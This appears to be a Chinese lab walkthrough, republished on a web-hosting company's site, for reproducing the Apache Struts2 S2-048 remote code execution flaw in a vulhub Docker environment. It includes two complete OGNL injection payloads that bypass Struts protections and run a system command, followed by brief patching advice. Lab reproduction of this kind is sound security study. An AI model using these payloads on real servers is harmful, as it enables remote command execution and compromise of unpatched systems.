怎么进行ApacheStruts2--048远程代码执行漏洞复现

这期内容当中小编将会给大家带来有关怎么进行Apache Struts2--048远程代码执行漏洞复现,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。

目前创新互联建站已为上1000+的企业提供了网站建设、域名、网站空间、网站托管、服务器租用、企业网站设计、咸宁网站维护等服务,公司将坚持客户导向、应用为本的策略,正道将秉承"和谐、参与、激情"的文化,与客户和合作伙伴齐心协力一起成长,共同发展。

0x00简介

Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。

0x01漏洞概述

Apache Struts2 2.3.x 系列启用了struts2-struts1-plugin 插件并且存在 struts2-showcase 目录,其漏洞成因是当ActionMessage接收客户可控的参数数据时,由于后续数据拼接传递后处理不当导致任意代码执行

0x02影响范围

Apache Struts 2.3.x系列中启用了struts2-struts1-plugin插件的版本。

0x03环境搭建

1.自行搭建Apache Struts2较为复杂,本次漏洞环境使用vulhub中的docker环境搭建。

下载地址:https://github.com/vulhub/vulhub

2.下载完成后解压进入s2-048目录,启动漏洞环境

cd cd vulhub-master/struts2/s2-048/    //进入目录

怎么进行Apache Struts2--048远程代码执行漏洞复现

docker-compose up -d  //启动靶场

怎么进行Apache Struts2--048远程代码执行漏洞复现

3.使用docker ps 查看是否启动成功

怎么进行Apache Struts2--048远程代码执行漏洞复现

4.在浏览器输入http:your-ip:8080/hello.action,看到以下页面环境搭建完成

怎么进行Apache Struts2--048远程代码执行漏洞复现

0x04漏洞复现

1. 在浏览器输入以下链接访问漏洞页面

http://192.168.3.160:8080/integration/saveGangster.action

怎么进行Apache Struts2--048远程代码执行漏洞复现

2.在第一个表单“Gangster Name”处输入${1+1},下面随意输入,点击submit提交查看执行了OGNL 表达式

怎么进行Apache Struts2--048远程代码执行漏洞复现

怎么进行Apache Struts2--048远程代码执行漏洞复现

2. 在Gangster Name”处把${1+1}修改为以下命令执行的payload语句

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}

怎么进行Apache Struts2--048远程代码执行漏洞复现

怎么进行Apache Struts2--048远程代码执行漏洞复现

3. 也可以使用Burp抓包修改成命令执行的payload的语句

注:payload需要使用URL编码

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

怎么进行Apache Struts2--048远程代码执行漏洞复现

怎么进行Apache Struts2--048远程代码执行漏洞复现

4. 可以使用自动化脚本或图形化工具实现,这里不做演示。

工具可在GitHub上搜索下载

0x05修复建议

1. 升级 建议升级到最新版本

2、根据业务情况,禁用关闭(删除) \struts-2.3.x\apps\struts2-showcase.war包

上述就是小编为大家分享的怎么进行Apache Struts2--048远程代码执行漏洞复现了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注创新互联行业资讯频道。

本文标题:怎么进行ApacheStruts2--048远程代码执行漏洞复现
网页URL:https://www.cdcxhl.com/article0/ipscoo.html

成都网站建设公司_创新互联,为您提供虚拟主机服务器托管App开发标签优化外贸建站软件开发

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联

网站优化排名